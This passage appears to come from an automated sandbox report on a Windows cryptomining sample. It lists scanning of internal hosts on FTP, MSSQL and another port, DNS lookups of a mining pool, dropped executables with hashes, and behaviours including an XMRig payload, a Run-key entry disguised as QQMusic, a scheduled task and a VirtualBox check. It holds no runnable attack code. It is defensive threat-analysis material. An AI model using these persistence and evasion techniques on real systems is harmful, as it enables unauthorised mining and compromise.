N/A 10.127.0.212:1433 tcp
N/A 10.127.0.20:21 tcp
N/A 10.127.0.213:1433 tcp
N/A 10.127.0.21:21 tcp
N/A 10.127.0.214:1433 tcp
N/A 10.127.0.22:21 tcp
N/A 10.127.0.215:1433 tcp
N/A 10.127.0.23:21 tcp
N/A 10.127.0.24:21 tcp
N/A 10.127.0.216:1433 tcp
N/A 10.127.0.217:1433 tcp
N/A 10.127.0.25:21 tcp
N/A 10.127.0.26:21 tcp
N/A 10.127.0.218:1433 tcp
N/A 10.127.0.219:1433 tcp
N/A 10.127.0.27:21 tcp
N/A 10.127.0.220:1433 tcp
N/A 10.127.0.28:21 tcp
N/A 10.127.0.221:1433 tcp
N/A 10.127.0.29:21 tcp
N/A 10.127.0.222:1433 tcp
N/A 10.127.0.30:21 tcp
N/A 10.127.0.223:1433 tcp
N/A 10.127.0.31:21 tcp
N/A 10.127.0.224:1433 tcp
N/A 10.127.0.32:21 tcp
N/A 10.127.0.225:1433 tcp
N/A 10.127.0.33:21 tcp
N/A 10.127.0.226:1433 tcp
N/A 10.127.0.34:21 tcp
N/A 10.127.0.227:1433 tcp
N/A 10.127.0.35:21 tcp
N/A 10.127.0.36:21 tcp
N/A 10.127.0.228:1433 tcp
N/A 10.127.0.229:1433 tcp
N/A 10.127.0.37:21 tcp
N/A 10.127.0.230:1433 tcp
N/A 10.127.0.38:21 tcp
N/A 10.127.0.231:1433 tcp
N/A 10.127.0.39:21 tcp
N/A 10.127.0.232:1433 tcp
N/A 10.127.0.40:21 tcp
N/A 10.127.0.233:1433 tcp
N/A 10.127.0.41:21 tcp
N/A 10.127.0.42:21 tcp
N/A 10.127.0.234:1433 tcp
N/A 10.127.0.235:1433 tcp
N/A 10.127.0.43:21 tcp
N/A 10.127.0.236:1433 tcp
N/A 10.127.0.44:21 tcp
N/A 10.127.0.237:1433 tcp
N/A 10.127.0.45:21 tcp
N/A 10.127.0.238:1433 tcp
N/A 10.127.0.46:21 tcp
N/A 10.127.0.239:1433 tcp
N/A 10.127.0.47:21 tcp
N/A 10.127.0.48:21 tcp
N/A 10.127.0.50:21 tcp
N/A 10.127.0.51:21 tcp
N/A 10.127.0.52:21 tcp
N/A 10.127.0.240:1433 tcp
N/A 10.127.0.241:1433 tcp
N/A 10.127.0.53:21 tcp
N/A 10.127.0.242:1433 tcp
N/A 10.127.0.54:21 tcp
N/A 10.127.0.243:1433 tcp
N/A 10.127.0.55:21 tcp
N/A 10.127.0.244:1433 tcp
N/A 10.127.0.56:21 tcp
N/A 10.127.0.245:1433 tcp
N/A 10.127.0.57:21 tcp
N/A 10.127.0.246:1433 tcp
N/A 10.127.0.58:21 tcp
N/A 10.127.0.247:1433 tcp
N/A 10.127.0.59:21 tcp
N/A 10.127.0.248:1433 tcp
N/A 10.127.0.60:21 tcp
N/A 10.127.0.249:1433 tcp
N/A 10.127.0.61:21 tcp
N/A 10.127.0.250:1433 tcp
N/A 10.127.0.62:21 tcp
N/A 10.127.0.251:1433 tcp
N/A 10.127.0.63:21 tcp
N/A 10.127.0.252:1433 tcp
N/A 10.127.0.64:21 tcp
N/A 10.127.0.253:1433 tcp
N/A 10.127.0.65:21 tcp
N/A 10.127.0.254:1433 tcp
N/A 10.127.0.66:21 tcp
N/A 10.127.0.67:21 tcp
N/A 10.127.0.68:21 tcp
N/A 10.127.0.69:21 tcp
N/A 10.127.0.70:21 tcp
N/A 10.127.0.71:21 tcp
N/A 10.127.0.72:21 tcp
N/A 10.127.0.73:21 tcp
N/A 10.127.0.74:21 tcp
N/A 10.127.0.75:21 tcp
N/A 10.127.0.76:21 tcp
N/A 10.127.0.77:21 tcp
N/A 10.127.0.78:21 tcp
N/A 10.127.0.79:21 tcp
N/A 10.127.0.80:21 tcp
N/A 10.127.0.81:21 tcp
N/A 10.127.0.82:21 tcp
N/A 10.127.0.83:21 tcp
N/A 10.127.0.84:21 tcp
N/A 10.127.0.85:21 tcp
N/A 10.127.0.86:21 tcp
N/A 10.127.0.87:21 tcp
N/A 10.127.0.88:21 tcp
N/A 10.127.0.89:21 tcp
N/A 10.127.0.90:21 tcp
N/A 10.127.0.91:21 tcp
N/A 10.127.0.92:21 tcp
N/A 10.127.0.93:21 tcp
N/A 10.127.0.94:21 tcp
N/A 10.127.0.95:21 tcp
N/A 10.127.0.96:21 tcp
N/A 10.127.0.97:21 tcp
N/A 10.127.0.98:21 tcp
N/A 10.127.0.99:21 tcp
N/A 10.127.0.100:21 tcp
N/A 10.127.0.101:21 tcp
N/A 10.127.0.102:21 tcp
N/A 10.127.0.103:21 tcp
N/A 10.127.0.104:21 tcp
N/A 10.127.0.105:21 tcp
N/A 10.127.0.106:21 tcp
N/A 10.127.0.107:21 tcp
N/A 10.127.0.108:21 tcp
N/A 10.127.0.109:21 tcp
N/A 10.127.0.110:21 tcp
N/A 10.127.0.111:21 tcp
N/A 10.127.0.112:21 tcp
N/A 10.127.0.113:21 tcp
N/A 10.127.0.114:21 tcp
N/A 10.127.0.115:21 tcp
N/A 10.127.0.116:21 tcp
N/A 10.127.0.117:21 tcp
N/A 10.127.0.118:21 tcp
N/A 10.127.0.119:21 tcp
N/A 10.127.0.120:21 tcp
N/A 10.127.0.121:21 tcp
N/A 10.127.0.122:21 tcp
N/A 10.127.0.123:21 tcp
N/A 10.127.0.124:21 tcp
N/A 10.127.0.125:21 tcp
N/A 10.127.0.126:21 tcp
N/A 10.127.0.127:21 tcp
N/A 10.127.0.128:21 tcp
N/A 10.127.0.129:21 tcp
N/A 10.127.0.130:21 tcp
N/A 10.127.0.131:21 tcp
N/A 10.127.0.132:21 tcp
N/A 10.127.0.133:21 tcp
N/A 10.127.0.134:21 tcp
N/A 10.127.0.135:21 tcp
N/A 10.127.0.136:21 tcp
N/A 10.127.0.137:21 tcp
N/A 10.127.0.138:21 tcp
N/A 10.127.0.139:21 tcp
N/A 10.127.0.140:21 tcp
N/A 10.127.0.141:21 tcp
N/A 10.127.0.142:21 tcp
N/A 10.127.0.143:21 tcp
N/A 10.127.0.144:21 tcp
N/A 10.127.0.145:21 tcp
N/A 10.127.0.146:21 tcp
N/A 10.127.0.147:21 tcp
N/A 10.127.0.148:21 tcp
N/A 10.127.0.149:21 tcp
N/A 10.127.0.150:21 tcp
N/A 10.127.0.151:21 tcp
N/A 10.127.0.152:21 tcp
N/A 10.127.0.153:21 tcp
N/A 10.127.0.154:21 tcp
N/A 10.127.0.155:21 tcp
N/A 10.127.0.156:21 tcp
N/A 10.127.0.157:21 tcp
N/A 10.127.0.158:21 tcp
N/A 10.127.0.159:21 tcp
N/A 10.127.0.160:21 tcp
N/A 10.127.0.161:21 tcp
N/A 10.127.0.162:21 tcp
N/A 10.127.0.163:21 tcp
N/A 10.127.0.164:21 tcp
N/A 10.127.0.165:21 tcp
N/A 10.127.0.166:21 tcp
N/A 10.127.0.167:21 tcp
N/A 10.127.0.168:21 tcp
N/A 10.127.0.169:21 tcp
N/A 10.127.0.170:21 tcp
N/A 10.127.0.171:21 tcp
N/A 10.127.0.172:21 tcp
N/A 10.127.0.173:21 tcp
N/A 10.127.0.174:21 tcp
N/A 10.127.0.175:21 tcp
N/A 10.127.0.176:21 tcp
N/A 10.127.0.177:21 tcp
N/A 10.127.0.178:21 tcp
N/A 10.127.0.179:21 tcp
N/A 10.127.0.180:21 tcp
N/A 10.127.0.181:21 tcp
N/A 10.127.0.182:21 tcp
N/A 10.127.0.184:21 tcp
N/A 10.127.0.183:21 tcp
N/A 10.127.0.185:21 tcp
N/A 10.127.0.186:21 tcp
N/A 10.127.0.187:21 tcp
N/A 10.127.0.188:21 tcp
N/A 10.127.0.190:21 tcp
N/A 10.127.0.189:21 tcp
N/A 10.127.0.191:21 tcp
N/A 10.127.0.192:21 tcp
N/A 10.127.0.193:21 tcp
N/A 10.127.0.0:19490 tcp
N/A 10.127.0.194:21 tcp
N/A 10.127.0.1:19490 tcp
N/A 10.127.0.2:19490 tcp
N/A 10.127.0.195:21 tcp
N/A 10.127.0.3:19490 tcp
N/A 10.127.0.196:21 tcp
N/A 10.127.0.4:19490 tcp
N/A 10.127.0.197:21 tcp
N/A 10.127.0.5:19490 tcp
N/A 10.127.0.198:21 tcp
N/A 10.127.0.6:19490 tcp
N/A 10.127.0.199:21 tcp
N/A 10.127.0.200:21 tcp
N/A 10.127.0.7:19490 tcp
N/A 10.127.0.201:21 tcp
N/A 10.127.0.8:19490 tcp
N/A 10.127.0.202:21 tcp
N/A 10.127.0.9:19490 tcp
N/A 10.127.0.203:21 tcp
N/A 10.127.0.10:19490 tcp
N/A 10.127.0.11:19490 tcp
N/A 10.127.0.204:21 tcp
N/A 10.127.0.205:21 tcp
N/A 10.127.0.12:19490 tcp
N/A 10.127.0.13:19490 tcp
N/A 10.127.0.206:21 tcp
N/A 10.127.0.14:19490 tcp
N/A 10.127.0.207:21 tcp
N/A 10.127.0.208:21 tcp
N/A 10.127.0.15:19490 tcp
N/A 10.127.0.16:19490 tcp
N/A 10.127.0.209:21 tcp
N/A 10.127.0.17:19490 tcp
N/A 10.127.0.18:19490 tcp
N/A 10.127.0.211:21 tcp
N/A 10.127.0.19:19490 tcp
N/A 10.127.0.210:21 tcp
N/A 10.127.0.212:21 tcp
N/A 10.127.0.20:19490 tcp
N/A 10.127.0.21:19490 tcp
N/A 10.127.0.213:21 tcp
N/A 10.127.0.22:19490 tcp
N/A 10.127.0.214:21 tcp
N/A 10.127.0.23:19490 tcp
N/A 10.127.0.215:21 tcp
N/A 10.127.0.216:21 tcp
N/A 10.127.0.24:19490 tcp
N/A 10.127.0.25:19490 tcp
N/A 10.127.0.217:21 tcp
N/A 10.127.0.26:19490 tcp
N/A 10.127.0.218:21 tcp
N/A 10.127.0.219:21 tcp
N/A 10.127.0.27:19490 tcp
N/A 10.127.0.220:21 tcp
N/A 10.127.0.28:19490 tcp
N/A 10.127.0.29:19490 tcp
N/A 10.127.0.221:21 tcp
N/A 10.127.0.222:21 tcp
N/A 10.127.0.30:19490 tcp
N/A 10.127.0.223:21 tcp
N/A 10.127.0.31:19490 tcp
N/A 10.127.0.224:21 tcp
N/A 10.127.0.32:19490 tcp
N/A 10.127.0.225:21 tcp
N/A 10.127.0.33:19490 tcp
N/A 10.127.0.226:21 tcp
N/A 10.127.0.34:19490 tcp
N/A 10.127.0.35:19490 tcp
N/A 10.127.0.227:21 tcp
N/A 10.127.0.228:21 tcp
N/A 10.127.0.36:19490 tcp
N/A 10.127.0.37:19490 tcp
N/A 10.127.0.229:21 tcp
N/A 10.127.0.38:19490 tcp
N/A 10.127.0.230:21 tcp
N/A 10.127.0.39:19490 tcp
N/A 10.127.0.231:21 tcp
N/A 10.127.0.40:19490 tcp
N/A 10.127.0.232:21 tcp
N/A 10.127.0.233:21 tcp
N/A 10.127.0.41:19490 tcp
N/A 10.127.0.42:19490 tcp
N/A 10.127.0.234:21 tcp
N/A 10.127.0.235:21 tcp
N/A 10.127.0.43:19490 tcp
N/A 10.127.0.44:19490 tcp
N/A 10.127.0.236:21 tcp
N/A 10.127.0.45:19490 tcp
N/A 10.127.0.237:21 tcp
N/A 10.127.0.46:19490 tcp
N/A 10.127.0.238:21 tcp
N/A 10.127.0.47:19490 tcp
N/A 10.127.0.239:21 tcp
N/A 10.127.0.48:19490 tcp
N/A 10.127.0.50:19490 tcp
N/A 10.127.0.51:19490 tcp
N/A 10.127.0.52:19490 tcp
N/A 10.127.0.240:21 tcp
N/A 10.127.0.53:19490 tcp
N/A 10.127.0.241:21 tcp
N/A 10.127.0.242:21 tcp
N/A 10.127.0.54:19490 tcp
N/A 10.127.0.243:21 tcp
N/A 10.127.0.55:19490 tcp
N/A 10.127.0.244:21 tcp
N/A 10.127.0.56:19490 tcp
N/A 10.127.0.57:19490 tcp
N/A 10.127.0.245:21 tcp
N/A 10.127.0.58:19490 tcp
N/A 10.127.0.246:21 tcp
N/A 10.127.0.59:19490 tcp
N/A 10.127.0.247:21 tcp
N/A 10.127.0.60:19490 tcp
N/A 10.127.0.248:21 tcp
N/A 10.127.0.249:21 tcp
N/A 10.127.0.61:19490 tcp
N/A 10.127.0.62:19490 tcp
N/A 10.127.0.250:21 tcp
N/A 10.127.0.63:19490 tcp
N/A 10.127.0.251:21 tcp
N/A 10.127.0.252:21 tcp
N/A 10.127.0.64:19490 tcp
N/A 10.127.0.65:19490 tcp
N/A 10.127.0.253:21 tcp
N/A 10.127.0.254:21 tcp
N/A 10.127.0.66:19490 tcp
N/A 10.127.0.67:19490 tcp
N/A 10.127.0.68:19490 tcp
N/A 10.127.0.69:19490 tcp
N/A 10.127.0.70:19490 tcp
N/A 10.127.0.71:19490 tcp
N/A 10.127.0.72:19490 tcp
N/A 10.127.0.73:19490 tcp
N/A 10.127.0.74:19490 tcp
N/A 10.127.0.75:19490 tcp
N/A 10.127.0.76:19490 tcp
N/A 10.127.0.77:19490 tcp
N/A 10.127.0.78:19490 tcp
N/A 10.127.0.79:19490 tcp
N/A 10.127.0.80:19490 tcp
N/A 10.127.0.81:19490 tcp
N/A 10.127.0.82:19490 tcp
N/A 10.127.0.83:19490 tcp
N/A 10.127.0.84:19490 tcp
N/A 10.127.0.85:19490 tcp
N/A 10.127.0.86:19490 tcp
N/A 10.127.0.87:19490 tcp
N/A 10.127.0.88:19490 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.90:19490 tcp
N/A 10.127.0.91:19490 tcp
N/A 10.127.0.92:19490 tcp
N/A 10.127.0.93:19490 tcp
N/A 10.127.0.94:19490 tcp
N/A 10.127.0.95:19490 tcp
N/A 10.127.0.96:19490 tcp
N/A 10.127.0.97:19490 tcp
N/A 10.127.0.98:19490 tcp
N/A 10.127.0.99:19490 tcp
N/A 10.127.0.100:19490 tcp
N/A 10.127.0.101:19490 tcp
N/A 10.127.0.102:19490 tcp
N/A 10.127.0.103:19490 tcp
N/A 10.127.0.104:19490 tcp
N/A 10.127.0.105:19490 tcp
N/A 10.127.0.106:19490 tcp
N/A 10.127.0.107:19490 tcp
N/A 10.127.0.108:19490 tcp
N/A 10.127.0.109:19490 tcp
N/A 10.127.0.110:19490 tcp
N/A 10.127.0.111:19490 tcp
N/A 10.127.0.112:19490 tcp
N/A 10.127.0.113:19490 tcp
N/A 10.127.0.114:19490 tcp
N/A 10.127.0.115:19490 tcp
N/A 10.127.0.116:19490 tcp
N/A 10.127.0.117:19490 tcp
N/A 10.127.0.118:19490 tcp
N/A 10.127.0.119:19490 tcp
N/A 10.127.0.120:19490 tcp
N/A 10.127.0.121:19490 tcp
N/A 10.127.0.122:19490 tcp
N/A 10.127.0.123:19490 tcp
N/A 10.127.0.124:19490 tcp
N/A 10.127.0.125:19490 tcp
N/A 10.127.0.126:19490 tcp
N/A 10.127.0.127:19490 tcp
N/A 10.127.0.128:19490 tcp
N/A 10.127.0.129:19490 tcp
N/A 10.127.0.130:19490 tcp
N/A 10.127.0.131:19490 tcp
N/A 10.127.0.132:19490 tcp
N/A 10.127.0.133:19490 tcp
N/A 10.127.0.134:19490 tcp
N/A 10.127.0.135:19490 tcp
N/A 10.127.0.136:19490 tcp
N/A 10.127.0.137:19490 tcp
N/A 10.127.0.138:19490 tcp
N/A 10.127.0.139:19490 tcp
N/A 10.127.0.140:19490 tcp
N/A 10.127.0.141:19490 tcp
N/A 10.127.0.142:19490 tcp
N/A 10.127.0.143:19490 tcp
N/A 10.127.0.144:19490 tcp
N/A 10.127.0.145:19490 tcp
N/A 10.127.0.146:19490 tcp
N/A 10.127.0.147:19490 tcp
N/A 10.127.0.148:19490 tcp
N/A 10.127.0.149:19490 tcp
N/A 10.127.0.150:19490 tcp
N/A 10.127.0.151:19490 tcp
N/A 10.127.0.152:19490 tcp
N/A 10.127.0.153:19490 tcp
N/A 10.127.0.154:19490 tcp
N/A 10.127.0.155:19490 tcp
N/A 10.127.0.156:19490 tcp
N/A 10.127.0.157:19490 tcp
N/A 10.127.0.158:19490 tcp
N/A 10.127.0.159:19490 tcp
N/A 10.127.0.160:19490 tcp
N/A 10.127.0.161:19490 tcp
N/A 10.127.0.162:19490 tcp
N/A 10.127.0.163:19490 tcp
N/A 10.127.0.164:19490 tcp
N/A 10.127.0.165:19490 tcp
N/A 10.127.0.166:19490 tcp
N/A 10.127.0.167:19490 tcp
N/A 10.127.0.168:19490 tcp
N/A 10.127.0.169:19490 tcp
N/A 10.127.0.170:19490 tcp
N/A 10.127.0.171:19490 tcp
N/A 10.127.0.172:19490 tcp
N/A 10.127.0.173:19490 tcp
N/A 10.127.0.174:19490 tcp
N/A 10.127.0.175:19490 tcp
N/A 10.127.0.176:19490 tcp
N/A 10.127.0.177:19490 tcp
N/A 10.127.0.178:19490 tcp
N/A 10.127.0.179:19490 tcp
N/A 10.127.0.180:19490 tcp
N/A 10.127.0.181:19490 tcp
N/A 10.127.0.182:19490 tcp
N/A 10.127.0.184:19490 tcp
N/A 10.127.0.183:19490 tcp
N/A 10.127.0.185:19490 tcp
N/A 10.127.0.186:19490 tcp
N/A 10.127.0.187:19490 tcp
N/A 10.127.0.188:19490 tcp
N/A 10.127.0.189:19490 tcp
N/A 10.127.0.190:19490 tcp
N/A 10.127.0.191:19490 tcp
N/A 10.127.0.192:19490 tcp
N/A 10.127.0.193:19490 tcp
N/A 10.127.0.194:19490 tcp
N/A 10.127.0.195:19490 tcp
N/A 10.127.0.196:19490 tcp
N/A 10.127.0.197:19490 tcp
N/A 10.127.0.198:19490 tcp
N/A 10.127.0.199:19490 tcp
N/A 10.127.0.200:19490 tcp
N/A 10.127.0.201:19490 tcp
N/A 10.127.0.202:19490 tcp
N/A 10.127.0.203:19490 tcp
N/A 10.127.0.204:19490 tcp
N/A 10.127.0.205:19490 tcp
N/A 10.127.0.206:19490 tcp
N/A 10.127.0.207:19490 tcp
N/A 10.127.0.208:19490 tcp
N/A 10.127.0.209:19490 tcp
N/A 10.127.0.210:19490 tcp
N/A 10.127.0.211:19490 tcp
N/A 10.127.0.212:19490 tcp
N/A 10.127.0.213:19490 tcp
N/A 10.127.0.214:19490 tcp
N/A 10.127.0.215:19490 tcp
N/A 10.127.0.216:19490 tcp
N/A 10.127.0.217:19490 tcp
N/A 10.127.0.218:19490 tcp
N/A 10.127.0.219:19490 tcp
N/A 10.127.0.220:19490 tcp
N/A 10.127.0.221:19490 tcp
N/A 10.127.0.222:19490 tcp
N/A 10.127.0.223:19490 tcp
N/A 10.127.0.224:19490 tcp
N/A 10.127.0.225:19490 tcp
N/A 10.127.0.226:19490 tcp
N/A 10.127.0.227:19490 tcp
N/A 10.127.0.228:19490 tcp
N/A 10.127.0.229:19490 tcp
N/A 10.127.0.230:19490 tcp
N/A 10.127.0.231:19490 tcp
N/A 10.127.0.232:19490 tcp
N/A 10.127.0.233:19490 tcp
N/A 10.127.0.234:19490 tcp
N/A 10.127.0.235:19490 tcp
N/A 10.127.0.236:19490 tcp
N/A 10.127.0.237:19490 tcp
N/A 10.127.0.238:19490 tcp
N/A 10.127.0.239:19490 tcp
N/A 10.127.0.240:19490 tcp
N/A 10.127.0.241:19490 tcp
N/A 10.127.0.242:19490 tcp
N/A 10.127.0.243:19490 tcp
N/A 10.127.0.244:19490 tcp
N/A 10.127.0.245:19490 tcp
N/A 10.127.0.246:19490 tcp
N/A 10.127.0.247:19490 tcp
N/A 10.127.0.248:19490 tcp
N/A 10.127.0.249:19490 tcp
N/A 10.127.0.250:19490 tcp
N/A 10.127.0.251:19490 tcp
N/A 10.127.0.252:19490 tcp
N/A 10.127.0.253:19490 tcp
N/A 10.127.0.254:19490 tcp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 nishabii.xyz udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 nishabii.xyz udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 nishabii.xyz udp

Files

\ProgramData\syabcd.exe

MD5 23d84a7ed2e8e76d0a13197b74913654
SHA1 23d04ba674bafbad225243dc81ce7eccd744a35a
SHA256 ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512 aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

memory/3016-9-0x0000000004390000-0x00000000049D4000-memory.dmp

memory/2976-10-0x000000013FFA0000-0x00000001405E4000-memory.dmp

memory/2976-11-0x00000000001F0000-0x0000000000204000-memory.dmp

\ProgramData\SMB.exe

MD5 7b2f170698522cd844e0423252ad36c1
SHA1 303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA256 5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA512 7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

memory/2976-135-0x000000013FFA0000-0x00000001405E4000-memory.dmp

C:\ProgramData\X86.dll

MD5 900c175024c7aa58aab0c62897e2471a
SHA1 fc51f654aa35576b5421869ba621effe73bf1c46
SHA256 de23da87e7fbecb2eaccbb85eeff465250dbca7c0aba01a2766761e0538f90b6
SHA512 45ed21b83987a0a5e4320d06cabf8534aa04dfb0a5f7ff1d9df6ae247f7b813a9a5c8d36edb2132e07ef3f5b0eb49ac1757328ca73ae95d894b7eb23abd591e9

C:\ProgramData\X64.dll

MD5 7dbb3316d7e7c4d367b7ff69768b3472
SHA1 b3457b8ad7600743c55fb31113efbc9313a0ce2e
SHA256 20e32f90720b6cf031498411930c65dc63f1a9b5f6b9553f2582d6f599a7ad48
SHA512 c5a69eaf986f2f41cb3f629f6f1f3334aed3c68ce4cfa49e4732baf4682118520a81dc75f9d02160a7987b6d1abf84c2acb5e06c609b8f283c0f872af66bcd72

memory/2976-141-0x000000013FFA0000-0x00000001405E4000-memory.dmp

memory/1416-144-0x000000013F060000-0x000000013F6A4000-memory.dmp

memory/1416-147-0x000000013F060000-0x000000013F6A4000-memory.dmp

memory/2272-150-0x000000013FB00000-0x0000000140144000-memory.dmp

memory/2272-152-0x000000013FB00000-0x0000000140144000-memory.dmp

memory/2272-153-0x000000013FB00000-0x0000000140144000-memory.dmp

memory/1500-158-0x000000013F190000-0x000000013F7D4000-memory.dmp

memory/2924-159-0x000000013F860000-0x000000013FEA4000-memory.dmp

memory/2924-161-0x000000013F860000-0x000000013FEA4000-memory.dmp

memory/2924-162-0x000000013F860000-0x000000013FEA4000-memory.dmp

memory/2988-166-0x000000013FDC0000-0x0000000140404000-memory.dmp

memory/2988-167-0x000000013FDC0000-0x0000000140404000-memory.dmp

memory/2900-170-0x000000013F020000-0x000000013F664000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

MD5 2cf24966a6aad7b6ecffe04a20eaf3dd
SHA1 e50a4184953faeec7e40bb33f52c08d7f22a2519
SHA256 01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
SHA512 5e4eda6d61438e46c5e93b994dcda0cddcb24a0f19529605715f74c91a9ad0cf30fd592aba8111d2aaae8c340f6b2860564f6b35e871df3f362afb48aea094f1

memory/2900-173-0x000000013F020000-0x000000013F664000-memory.dmp

memory/2900-175-0x000000013F020000-0x000000013F664000-memory.dmp

memory/1636-178-0x000000013F3D0000-0x000000013FA14000-memory.dmp

memory/1636-181-0x000000013F3D0000-0x000000013FA14000-memory.dmp

memory/2776-184-0x000000013F430000-0x000000013FA74000-memory.dmp

memory/2776-186-0x000000013F430000-0x000000013FA74000-memory.dmp

memory/2776-187-0x000000013F430000-0x000000013FA74000-memory.dmp

memory/2592-190-0x000000013F500000-0x000000013FB44000-memory.dmp

memory/2592-193-0x000000013F500000-0x000000013FB44000-memory.dmp

memory/1608-196-0x000000013FE10000-0x0000000140454000-memory.dmp

memory/1608-198-0x000000013FE10000-0x0000000140454000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 14:38

Reported

2024-06-14 14:40

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
